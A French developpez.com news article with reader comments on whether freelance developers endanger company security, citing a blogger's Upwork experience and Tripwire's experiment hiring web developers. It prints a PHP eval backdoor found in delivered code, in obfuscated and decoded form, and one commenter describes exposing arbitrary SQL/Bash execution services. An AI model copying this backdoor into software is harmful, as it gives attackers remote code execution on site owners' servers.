Les développeurs indépendants représentent-ils un risque pour la sécurité des entreprises ?

**Stéphane le calme** · 12/06/2017, 13h04

Les développeurs indépendants représentent-ils un risque pour la sécurité des entreprises ?
Oui, selon une étude

Les travailleurs indépendants se sont révélés être une ressource extrêmement utile pour de nombreuses petites entreprises au cours des dernières années, ce qui permet de recruter des compétences spécialisées au besoin. D’ailleurs même les grandes enseignes de la technologie, à l’instar de la NASA ou de Google, ont déjà eu recours à l'externalisation des services informatiques.

Cependant, Robert Hansen, un spécialiste du mobile, a décrit une mauvaise expérience qu’il a eue en juin 2016 lorsqu’il devait externaliser la mise à jour de son blog Smartphone Exec. Il est passé par la plateforme américaine de freelance Upwork.

« Durant la première semaine, les choses se sont bien déroulées. Une communication régulière et des délais clairs sont importants. Mais ce développeur particulier avait quelques tours dans ses manches. Tout d'abord, le compte dont il se servait était un front pour une équipe de développement plus grande. Cette équipe de développement n'était pas disposée à utiliser la fonction Upwork intégrée pour effectuer le suivi du travail dans le temps », a-t-il expliqué.

Pour rappel, Upwork se sert d’une application pour permettre au client de suivre l’évolution du travail qu’il a commandé dans le temps : l’application se charge alors d’apporter aux clients divers éléments (capture d’écran, photo prise par la webcam du travailleur indépendant – si celui-ci l’autorise –, etc.) qui seront alors situés dans une chronologie que le client pourra parcourir à sa guise. Le fait que le développeur, ainsi que l’équipe avec laquelle il travaille, refuse de se servir de cette application a été pour Hansen « Le premier signe que quelque chose allait de travers. »

« En second lieu, il a fallu 40 heures pour conditionner le code pour la livraison - quelque chose qui aurait dû être extrêmement simple à faire si le code était effectivement développé de manière professionnelle. Mais le dernier problème était le plus lourd », a-t-il continué.

« Lorsque le code m’a été livré, il était dans un format que l’iPhone ne peut pas gérer facilement – les fichiers zip. J'ai donc brisé ma règle et l'ai téléchargée dans un ordinateur et avant même de pouvoir le décompresser, Microsoft Security Essentials a trouvé quelque chose qui lui semblait suspect. J'ai donc creusé dans le code et j'ai trouvé six portes dérobées PHP qui permettraient à ce développeur et à leur équipe d'accéder à ce site. »

Voici un exemple de ce à quoi ressemblait le code avant la décompression :

Code PHP :

Sélectionner tout - Visualiser dans une fenêtre à part

<?PHP $viu0="sutpe_or"; $iwvk7=$viu0[0].$viu0[2].$viu0[7].$viu0[2].$viu0[6].$viu0[1].$viu0[3].$viu0[3].$viu0[4].$viu0[7]; $uvwh73=$iwvk7 ($viu0[5].$viu0[3].$viu0[6].$viu0[0].$viu0[2]); if(isset(${$uvwh73}['q490ded'])){eval( ${$uvwh73}['q490ded']);} ?>

Après la décompression, il ressemblait à ceci :

Code PHP :

Sélectionner tout - Visualiser dans une fenêtre à part

<?PHP if(isset(${_POST}['q490ded'])){eval(${_POST}['q490ded']);} ?>

« Fondamentalement, ce que cela dit, c'est que chaque fois que leur équipe irait sur mon site Web et ferait une demande POST sur mon site avec le paramètre ci-dessus, ils auraient pu exécuter n'importe quelle commande, comme s’ils avaient le même niveau d'accès que j'avais. »

Suite à cette situation, l’entreprise de sécurité Tripwire s’est intéressée à la question de savoir si, lorsqu’un client (entreprise ou particulier) fait appel à ce genre de travailleurs, en particulier pour des projets informatiques, cela pourrait compromettre la sécurité de l’entreprise. Pour savoir à quel point ce problème peut être répandu, l’entreprise a eu l’idée de mener une expérience auprès de 25 développeurs indépendants.

L’équipe VERT (Vulnerability and Exposure Research Team) de Tripwire a envoyé un courrier à l’ensemble des candidats avec le même projet, la création d’un site web avec différentes fonctionnalités : « Le plan était simple: créer un personnage non technique et, en tant que tel, embaucher un certain nombre de travailleurs indépendants pour créer un site web. Chaque entrepreneur a reçu le même courrier électronique avec les mêmes critères. »

Bien que l'équipe ne savait pas à quoi s'attendre, elle avait une série d'objectifs à l'esprit. Tout d'abord, elle voulait analyser les interactions avec les entrepreneurs. Comment était la communication ? Ont-ils tenté d'arnaquer le client ou le marché ? Combien accepteraient le travail, et combien le refuseraient ou tenteraient d'augmenter les enchères ?

Autant de questions que l’équipe a trouvé intéressantes même si, finalement, elle s’est fixé deux objectifs principaux :

tout d'abord, elle voulait identifier les portes dérobées, les mots de passe codés et les actions intentionnellement malveillantes prises par les entrepreneurs ;
ensuite, elle voulait trouver tous les défauts et les vulnérabilités dans le code livré.

25 développeurs ont répondu à l’appel de cette offre proposée à 250 dollars. Plusieurs ont sollicité une communication et un paiement hors de la plateforme, probablement pour éviter de payer la commission à Upwork, ce qui a conduit à la fermeture immédiate de leur compte pour violations de conditions et services. D’autres ont été exclus, car ils demandaient un montant plus élevé que le budget proposé.

Craig Young, chercheur principal en sécurité chez Tripwire

Cependant, 17 développeurs ont réussi à passer entre les mailles du filet. Ils ont mis entre 7 et 9 jours pour livrer leur client. Pendant le développement du projet, VERT a dû mettre fin à certains contrats pour plusieurs raisons, notamment :

L'entrepreneur a fourni une installation WordPress de base sans assistance pour les utilisateurs du site afin qu’ils puissent télécharger des documents. Le contractant a refusé de fournir un remboursement et a réclamé faussement (six fois) que le travail ait été effectué selon les spécifications du client. Le support à la clientèle devait être invoqué pour forcer un remboursement ;
L'entrepreneur a fourni des fichiers initiaux et a ensuite demandé d'annuler la commande parce qu'il « était occupé » quelques jours après le projet ;
L'entrepreneur a demandé plus d'argent immédiatement après avoir accepté le contrat. Il a évoqué un malentendu, prétendant avoir cru que le projet était de mettre à jour un site existant plutôt que d’en créer un nouveau ;
L'entrepreneur a régulièrement fourni des liens vers un site Web WordPress avec des problèmes de configuration qui ont conduit à des pages d’erreur. Deux semaines après la date limite, ils ont convenu de fournir un remboursement ;
L'entrepreneur a demandé l'URL du panneau de contrôle du site et a indiqué qu'il était difficile de créer un site sans cela. Le contrat a été annulé parce qu'ils ont déclaré par la suite qu’il faudrait 20 à 25 jours plutôt que les sept jours convenus, et que le prix aurait besoin d’être renégocié ;
L'entrepreneur a fourni un modèle de page HTML + JS et n'a pas pu fournir le jeu complet de fonctionnalités ;
L'entrepreneur n'a pas été en mesure de fournir des produits livrables après trois semaines.

« S'il s'agissait d'un projet du monde réel, ces conflits constitueraient un problème sérieux, qui entraînerait un dépassement du budget alloué au projet ou un dépassement de la date limite », a indiqué VERT. Et de préciser qu’en plus de cela, « le client aurait eu un site Web instable. »

À la fin, seuls 10 des 17 projets commandés ont été achevés et payés, a indiqué VERT.

Craig Young, chercheur principal en sécurité chez Tripwire, a affirmé que « Nous ne pouvons raisonnablement pas nous attendre à ce que les violations des données diminuent si les sites Web conçus par les développeurs ne sont pas réalisés avec des mesures de sécurité de base intégrées ».

Afin de ne pas être victime des mêmes défauts, Tripwire conseille aux entreprises qui recherchent un nouveau site Web ou d'autres projets connexes d'être plus pointues dans le processus de recrutement, surtout lorsqu'ils envisagent de prendre des entrepreneurs dans des fuseaux horaires différents des leurs.

L'entreprise recommande également d'analyser tous les projets finis avec un scanner de vulnérabilité d'application Web et, idéalement, chercher à obtenir une évaluation par un testeur de pénétration professionnel avant que le paiement final ne soit effectué.

Source : Smartphone Exec, TripWire

Et vous ?

Avez-vous déjà trouvé ou posé des backdoors dans du code ?

**mh-cbon** · 12/06/2017, 13h29

a aucun moment le donneur d’ordre ne se remet en question en disant, en fait, je demande un dev pour 250$, ptet que c'est une offre de merde qui n'attirera que les mouches à merde ... ?

Clairement, le type n'est tombé que sur de mauvais prestataires, le pire étant l'exemple mis en focus, puisque clairement le fournisseur de service a travailler dans l'intention de détourner la demande du client.

Encore fois, belle mise en généralité d'un phénomène qui reste marginal puisque bon tout cela ne représente que 26 tentatives....

Par ailleurs, combien de société presta de service informatique refile du magento ou wordpress sans maintenance ?
Ou simplement fournit sans les derniers patchs à jour.

**Grimly** · 12/06/2017, 13h42

Envoyé par Stéphane le calme

Avez-vous déjà trouvé ou posé des backdoors dans du code ?

Aller, juste pour alimenter les légendes des développeurs voyous : Oui !

Mes backdoors étaient carrément des services clairement exposés me permettant de jouer du code SQL ou Bash arbitraire sur l'environnement de mon choix.

Booouh le méchant développeur ! Sauf que ce dernier n'a fait que son travail et a obéis au chef de projet client qui a un passé de développeur. Au lieu d'investir sur des logs décentralisées et un minimum test sur le workflow, préférait faire du support avec SoapUI.

**RyzenOC** · 12/06/2017, 13h59

comme mh-cbon, 250$ pour un projet de 7 (ou 9

) jours sérieusement ???
si 1$=1€, c'est moins que le smic en france, et le pire c'est que le $>€ et que les salaires sont plus élevée aux states

et puis wordpress quoi... chez pas je trouve que sa sonne très mal avec "chercheur principal en sécurité".

la création d’un site web

Justement, aucune entreprise sérieuse ne fait un site web avec wordpress...

**Pierre Louis Chevalier** · 12/06/2017, 14h39

Envoyé par mh-cbon

a aucun moment le donneur d’ordre ne se remet en question en disant, en fait, je demande un dev pour 250$, ptet que c'est une offre de merde qui n'attirera que les mouches à merde ... ?

Si tu va sur les sites de freelances/missions tu verra que pourtant c'est courant.
C'est donc pertinent que les clients comprennent non seulement qu'ils demandent trop avec des budgets trop bas mais que d'autre part il y à des risques...

Envoyé par mh-cbon

alors que clairement, le type n'est tombé que sur de mauvais prestataires, le pire étant l'exemple mis en focus, puisque clairement le fournisseur de service a travailler dans l'intention de détourner la demande du client. Encore fois, belle mise en généralité d'un phénomène qui reste marginal puisque bon tout cela ne représente que 26 tentatives....

"Marginal" c'est vite dit, la cybercriminalité est en très forte croissance... et il suffit d'une fois, les conséquences peuvent êtres désastreuses, cela peu mener au dépôt de bilan d'une société et donc du chômage pour tous les employés, sans parler des clients lésés...
Si tu étais client tu saurais que les "mauvais prestataires" sont légions à ce tarif la.

C'est donc très important d'attirer l'attention des clients sur ces questions...

Si les clients étaient mieux sensibilisés, il feraient plus attention à payer des prestations plus chères avec des prestataires de qualité et non à commander n'importe quoi à n’importe qui.

Du coup ça rends cette news en encore plus le débat qui s'ensuit très important, la question mérite tout à fait d'être posée...

**Mimoza** · 12/06/2017, 15h04

@RyzenOC : Non 7 - 9 jours c'était le délai accordé pour fournir le travail, au vue des réponses il ne devait pas y avoir bien plus de 1 à 2 jours de boulot.

Mais clairement le mec a fait une mauvaise expérience et généralise, ensuite pour leur «test» il faudrait voir ce qu'ils proposaient exactement et le profil de ceux qui répondaient, si c'était de dev autoproclamé ou non. Mais c'est clair qu'un projet à 250$ ne va pas attirer la fine fleur des devs

**Mingolito** · 12/06/2017, 15h07

Tu as même des sites de services "tout à 5 $" et il y à des prestataires de dev et des webmasters la dedans !
Un site ou un dev pour 5 $ ? vraiment ?

**mh-cbon** · 12/06/2017, 15h07

C'est donc pertinent que les clients comprennent non seulement qu'ils demandent trop avec des budgets trop bas mais que que d'autre part il y à des risques...

J'objecterais simplement que nous ne sommes pas les dits-clients, donc cette news à définitivement un souci, selon moi.

Ce qui n'enlève pas l'idée, comme vous le soulignez, que la question mérite d'être posée, mais ni la forme ni le contenu ne me conviennent ici.

Bon après marginal, pas marginal, effectivement, je n'ai jamais demandé à quelqu'un d'autre de faire mon taff xd
Mais bon sur quels chiffres s'appuyer autres que ceux de la news, et partant de là, en venir à la conclusion d'une généralité malvenue ?

**Pierre Louis Chevalier** · 12/06/2017, 15h16

Il y à un point d'interrogation, c'est une question, pas une affirmation.
Pour moi la question est pertinente, et la news aussi, après l'étude qui sert de base à la news a un impact forcément limité mais il faut bien partir de quelque chose, et justement c'est intéressant de voir dans le fil si d'autres ont eu des expériences sur ce sujet...

Et détrompe-toi, il y à aussi des "clients" sur ce site, et des directions informatique qui font appel à des prestataires, il y à des millions de lecteurs pour info : Le Club developpez.com, c'est jusqu'à 4 millions de visiteurs uniques.
Je connais énormément de DI/DSI ou même simplement des gérants d'entreprise qui consultent developpez.com...

**Glutinus** · 12/06/2017, 15h44

Le titre stigmatise les indépendants, mais l'article évoque plus la prestation à l'extérieur. Indépendant comme cabinets de consulting, de 2 à 100 000 personnes, peuvent essayer d'entuber le client - à juste titre, car dans ma prime jeunesse, je louais une loyauté sans faille à ma SSII - bonjour ma naïeveté - et me méfiait dur comme fer des indépendants, le premier que j'ai rencontré étant un fieffé filou (jour facturé alors qu'il était absent, cinq jours-homme de travail alors qu'il a rendu un fichier SQL avec une vieille instruction... il avait même tenté de faire facturer une page de code que j'avais moi-même développée). Combien de commerciaux, à la belle époque, ont traficoté pour augmenter la facturation d'un consultant ? Combien ont mis fin au contrat à peine commencé parce qu'ils ont trouvé mieux facturé ailleurs ? Et combien ont trouvé des raisons fallacieuses alors que le consultant est parti ?

Le débat est intéressant, pourvu qu'il ne se penche pas non plus que sur les professionnels en IT. Je suis sûr qu'on peut trouver le même exemple en marketing, en coaching ou autre, ou le prestataire finit par demander plus ou court-circuite sous le manteau son intermédiaire - qu'il le court-circuite "proprement" est une chose, qu'il le fasse de manière détournée dès le début en dit très long sur son professionnalisme.

J'ai bossé pour une société de service qui devait développer en Java, et qui a fini au bout de deux mois par présenter une première mouture, un peu en mode POC en... PHP ! Le (gros) client, qui a une infrastructure IT, ne s'est évidemment pas laissé faire. La société de service a juste argué que c'était plus performant et moins lourd, avant de revenir sur du Java comme prévu. Et ce n'était pas une société de 5 quidams, mais une branche d'une bonne soixantaine de personnes qui devaient travailler dessus (pas que des devs, hein, des DBA, chef de projet, développeurs reporting, architecture, etc.)

Je ne vois pas trop la question initiale de VERT ("est-ce qu'un consultant en extérieur mais en danger la sécurité de mon entreprise") avec celle de la revalorisation des coûts...

**NSKis** · 12/06/2017, 16h14

Les explications du "client malheureux" sont à mourir de rire... Et j'ajouterai: "Il en a eu pour son argent!"

Quand on veut payer un service à un prix "bas de gamme", on a un service "bas de gamme"

En cela, le développeur a fourni très exactement le service demandé

**gallima** · 12/06/2017, 16h31

1) Ils en ont pour leur argent.

2) 40 pour monter le package ? Demande urgente -> Vendredi soiré bien arrosé -> Samedi levé tard le soir -> Dimanche matin calin -> demande vu dans la soiré et traité en 5 minutes pour le lundi matin.

3) Difficile de séparer un problème de sécurité malveillant d'un code de debuggage qui n'a pas été retiré; tant que la faille n'a pas été exploité on ne peut pas savoir.
C'est pas très différent de l'utilisation d'une bibliothèque que l'on sait buggé, ou troué d'un point de vue sécurité.

4) Sérieusement, ils allaient déployer du code développé en externe sur leurs serveur sans aucun processus de confiance ou de qualité ? De toutes façon leurs
équipes réseaux allais suivre les spécifications et bloquer toutes les requêtes non légitime.

5) Si le mec est un peu malin, le code malveillant restera totalement invisible jusqu'au jour où il frappera (et là encore il pourra rester invisible).

**thierryler** · 12/06/2017, 16h35

Par bien compris si c'est un forfait de 7 jours à 250$ ou 250$/jour sur 7 jours (ie. 1750$) ???

Invité · 12/06/2017, 16h36

La question soulevée est plus générale : peut-on faire confiance à quelqu'un qui propose une prestation sérieuse à un montant dérisoire ?
Sauf cas très particulier, ou coup de chance impensable, la réponse est clairement NON.

Dans le monde des indépendants, le jeu du moins disant est à fuir, un projet sérieux se voit financé de manière sérieuse, en fonction de son potentiel et de son utilité. De la même manière, une prestation a une valeur avant d'avoir un coût (et un tarif), donc faible valeur => faible tarif.

On pourrait même reformuler la question de l'article, qui au final dépasse de loin le monde de la prestation informatique : est-ce qu'on finit par tomber sur une entourloupe quand on les cherche ?

**koyosama** · 12/06/2017, 16h43

Pourtant le phenomene n'est pas nouveau, c'est pas different que de savoir que de mettre sur le boncoin un ordinateur peut aussi resulter par un appel ou un email d'Afrique.
Le phenomene wordpress et su diste pas cher s'amplifie fortement, on commence a faire croire aux gens que c'est facile de deveinir freelancer et surtout c'est facile de devenir developpeur.

Maintenant vous voyez des deals partout sur internet, des cours pour devenir developpeur.
La dicispline demande une certaine dexterite. J'ai cottoye sur freecodecamp par exemple quequ'un du fin fond de l'Asie qui voulait devenir developeur depuis chez ses parents. Ils voulaient ni bouger et voulait en faire le moins possible. C'etait plus le gars qui aimaient la programmation comme les kick ou lol qui voulaient programmer car ils aiement jouer au jeux videos. Bref, ils faisaient tous ces exos en copiant betement le code des autres, ils pensaient reussir a comprendre chaque ligne. Pour un exo qui auraient pu prendre 2 jours, ils mettaient deux semaines plein temps. Le truc c'est qu'il est parti sur du delire, je veux etre freelancer wordpress (j'aurais pas du lui insouffler l'idee). Donc ils commcent direct les cours pour creer une template avec du code sans meme connaitre les bases de PHP ou encore mySQL. Un jour, je lui ai dit que sa methode etaient tres mauvaise, je lui ai demande de faire un exo tout con. Faire un page d'isncription en PHP pour les participants pour une compeition. Je voulais juste voir s'il savaient faire du CRUD et surtout analyser un business quelconque. Guess what, c'etait trop dure pour lui, j'en revenais pas. La chose la plus simple, ile ne comprenait pas. C'etait meme pas le technique mais juste l'application en lui-meme. J'avais beau lui expliquer dans tous les sens, ils comprenaient pas. Il partait sur du delire de code pas possible, je lui ai donc demander quelque chose encore bien plus simple. Le truc le plus con au monde et qui sert dans les benchmark, une TODO list. Meme sa il avait du mal. Je n'ai pas demander ces exos pour lui faire la morale, mais pour voir si c'etait judicieux de commencer de parler de template wordpress , de coder en wordpress avant meme de savoir l'administrer apres 7 mois d'apprentissage en programmation. Donc quand je pense a lui, je pense a tous les glandus sur upwork.

Ce que je veux dire c'est que aujourd'hui on commence a creer une armee de developpeur pour rien. Par exemple 42 est une belle initiative mais Xavier Niel a ete clair, sur les 1000 gars, il veut juste choper les 2 exceptionnels.
Aujourd'hiui ces initiative de MOOC, de cours en ligne, sans compter les 90% de deals sur la suite complete pour devenir developeur, ça fait qu'on donne aux gens l'impression devenit developpeur c'est simple.
Je peux vous dire que sur les 10000 personnes inscrit sur freecodecamp, il y'en a peut etre 50 qui sont vraiment devenu developpeur.

Les entreprises qui veuelent outsourcer les competence IT sont aussi fautifs. Je peux comprendre qu'une petite companie veut avoir un site web pas cher. Mais j'ai rencontre des gens qui voulaient sous-payer expres les developpeurs. Meme un qui croyait que me payer 100 euros par mois pour faire un site web c'etait suffisant alors que deux jours d'heure sup et j'ai ces 100 euros.

Tu as deux problemes :

Le freelancer qui veut juste de l'argent facile alors qu'il devrait pas etre developpeur.
Certains cherchent juste parfois la premiere experiences et sa c'est la faute du marche.
L'entreprise qui croit que wordpress veut dire pas cher ou qu'un site web c'est pas cher a contruire alors que c'est faux.

Les gens oublient un site web evolue toujours, qu'une application quel qui soit doit se renouveler (exemple : NHS en angleterre). Je vois beaucoup d'histoire ou les gens se font pirater leur site car ils negliger fortement l'aspect technique car ils voulaient pas le faire. J'ai vu des gens qui voulaient ouvrir des entreprises literalement avec 0 euros (enseigne + site web) sans demander capital de fond, sans investisseur car ils croyaient qu'ouvrir une entreprise c'est juste de la paperasse.

Le phenomene de l'entrepreneur, de l'argent facile par le freelancing est amplifie par des gens qui donnent des success a m'importe qui. Ces conseils sont destines pas a m'importe qui, mais devraient a des gens qui ont de l'experience avec la vie et le business. Car maintenant tu as tous les etudiants, les gens des pays qui ont pas l'infrastructure pour faire le minimum requis qui ecoutent des conseils qu'ils devraient pas. Les gens devraient etre moins radins et plus responsable.

Personnellement, 7 jours c'est trop cours pour creer tout un nouveau site. Un portfolio, je peux comprendre, mais un nouveau site web avec des specificite, cela demande temps d'integration, de tests et developpement.

Vous connaissez le marche francais, mais le marche mondiale est vachement competitf. Ceux qui s'attaquent a un marche anglo-saxon a besoin d'etre aussi bon que les gens chez Google pour se faire recruter. Donc en fait la premiere experience, c'est un peu le far-west tout les coups sont permis.

**martopioche** · 12/06/2017, 18h05

Comme d'habitude avec un tel sujet, les commentaires sont limite plus passionnants, sinon terrifiants, que la news.

Envoyé par mh-cbon

Encore fois, belle mise en généralité d'un phénomène qui reste marginal puisque bon tout cela ne représente que 26 tentatives....

Marginal ? Malgré le faible échantillon, l'intérêt de cette étude est que c'en est une. Si tu affirme que le "phénomène reste marginal", quels sont tes chiffres ?
Pour ma part, je suis "indépendant", je suis sur une plate-forme d'indépendants et j'ai discuté avec les clients potentiels des réponses qu'ils ont eu à leurs appels d'offre. L'idée que je peux m'en faire n'est pas aussi précise que ce qui est relaté ici, mais j'estime que la tendance est similaire avec ce qui est décrit ici.

Par ailleurs, combien de société presta de service informatique refile du magento ou wordpress sans maintenance ?

Sur ce point par contre, je suis entièrement d'accord. Le "problème" ne se limite pas aux indépendants mais concerne tout prestataire de service.

Envoyé par Mimoza

il faudrait voir ce qu'ils proposaient exactement et le profil de ceux qui répondaient, si c'était de dev autoproclamé ou non.

"Il faudrait"… Alors autant pour les profils, je présume qu'ils resteront anonymes, autant pour voir ce qu'il proposait, il suffit de voir. Si "aller voir" parait insurmontable, je présume qu'il est temps de faire appel à un indépendant qui expliquera ce qu'est un concept de malade qui s'appelle le "lien hypertexte"…

Mais c'est clair qu'un projet à 250$ ne va pas attirer la fine fleur des devs

Certainement pas, mais à priori, aux US, les indépendants facturent au temps effectif avec la granularité de l'heure… En tout cas, c'est ce que semble montrer la plate-forme Upwork. De plus, cette dernière est hyper-compétitive, donc les prix ont tendance à aller vers le bas.

Envoyé par Glutinus

Le titre stigmatise les indépendants, mais l'article évoque plus la prestation à l'extérieur. Indépendant comme cabinets de consulting, de 2 à 100 000 personnes, peuvent essayer d'entuber le client

Exactement. C'est juste que ce ne sera pas de la même manière…

Le débat est intéressant, pourvu qu'il ne se penche pas non plus que sur les professionnels en IT. Je suis sûr qu'on peut trouver le même exemple en marketing, en coaching ou autre, ou le prestataire finit par demander plus ou court-circuite sous le manteau son intermédiaire - qu'il le court-circuite "proprement" est une chose, qu'il le fasse de manière détournée dès le début en dit très long sur son professionnalisme.

Exactement aussi, on peut évidemment étendre à tout secteur d'activité (on parle du bâtiment ? ). L'IT a tout de même la particularité d'être complètement abstrait et d'avoir des implications que n'ont pas les autres domaines. Je ne connais pas beaucoup d'interventions de plombiers qui ont rendu inefficace la porte blindée…

**martopioche** · 12/06/2017, 18h07

Envoyé par John Bournet

La question soulevée est plus générale : peut-on faire confiance à quelqu'un qui propose une prestation sérieuse à un montant dérisoire ?
Sauf cas très particulier, ou coup de chance impensable, la réponse est clairement NON.

Dans le monde des indépendants, le jeu du moins disant est à fuir, un projet sérieux se voit financé de manière sérieuse, en fonction de son potentiel et de son utilité. De la même manière, une prestation a une valeur avant d'avoir un coût (et un tarif), donc faible valeur => faible tarif.

On pourrait même reformuler la question de l'article, qui au final dépasse de loin le monde de la prestation informatique : est-ce qu'on finit par tomber sur une entourloupe quand on les cherche ?

Pourquoi "dérisoire" ? À priori, aux US, le principe est d'indiquer un tarif de l'heure et non de la journée. Pour du dev web, si on prends une base de 400/jour, on a du 50/heure soit 5 heures. Est-ce que le job nécessite plus de 5 heures effectives ?

**Glutinus** · 12/06/2017, 18h10

Envoyé par martopioche

Pourquoi "dérisoire" ? À priori, aux US, le principe est d'indiquer un tarif de l'heure et non de la journée. Pour du dev web, si on prends une base de 400/jour, on a du 50/heure soit 5 heures. Est-ce que le job nécessite plus de 5 heures effectives ?

Effectivement, j'ai lu l'article original et rien n'indique ce que donne ces $250. Mais VERT avoue eux-memes que c'était du low-cost, donc on peut imaginer que c'est du $250 / jour... et j'espère que ce n'était pas pour la semaine -_-'

**Jean-Philippe André** · 13/06/2017, 10h25

Tremblez, entreprises de peu de budget, tous les freelances viendront vous faire les poches de gre ou de force

**TiranusKBX** · 13/06/2017, 11h10

Voila le message qu'ils on envoyé aux devs

Hello Prospective Developer,
I'm looking to introduce my burgeoning business to the 21st century and I'm hoping that you'll be the one to help me. I run a small document
translation service for newly arrived immigrants in my community. I feel that a website will allow me to grow my business but also eliminate some
of the current problems I've been experiencing.
One of the issues I suffer from right now is lack of organization. Most of my clients are referrals from the community center or local immigration
agencies with a smattering of walk-in traffic from advertising. Many clients bring original documents or hard to read photocopies and I work from
the hard copy. Ideally I'd like to be able to work from a digital copy.
This will allow me to avoid upfront meetings with clients and to instead meet with them only upon delivery of the completed translation, this will
save me a great deal of time. So let's walk through the website flow to see if it's something you can help me with.
In addition to the homepage and a page listing my rates and contact information, my clients should be able to sign up for an account (Name, Email,
Password, Phone, Contact Info). Within the account, they should be able to view past translations and submit a new document for translation
(ideally a image or PDF scan of their documents) along with any notes I should have.
From my view, I'd like to be able to view the clients with accounts, remove old clients, and push out translated documents (always in PDF form) to
their accounts. Since most of my clients are new to the country and don't yet have credit cards, I'll need a way to indicate with each document when
they have paid me for my services, once I mark it as paid, the client should be able to see the document.
In the future I'd hope to add a way to accept online payments, so please keep that in mind but right now it's not a requirement.
Additionally, I'd like to have a page that allows my clients to leave public feedback, so that other potential clients can get a feel for my business and
me.
I called the tech support number for a web hosting service and they suggested I hire someone to develop for the "lamp stack"? I'm hoping you
know what that is. They also said that as long as I had the files for the website and something called a sequel file that it would be easy to setup via
their administrative pages.
Finally, I've been advised to confirm upfront that I will own all code when you have completed the website. A friend of mine used this service
before and shortly after their website was published, they received a DMCA Takedown notice for copyright infringement. I want to be sure that that
won't happen here. Once payment is completed via the website, our business will have concluded and I will own all work product.
I look forward to hearing back from you and taking the technological leap to having an electronic storefront.
Thank you.

Personnellement pour tout ça je demanderais 1200€ mini

@thierryler dans le document de l'étude c'est écrit 250$ travail terminé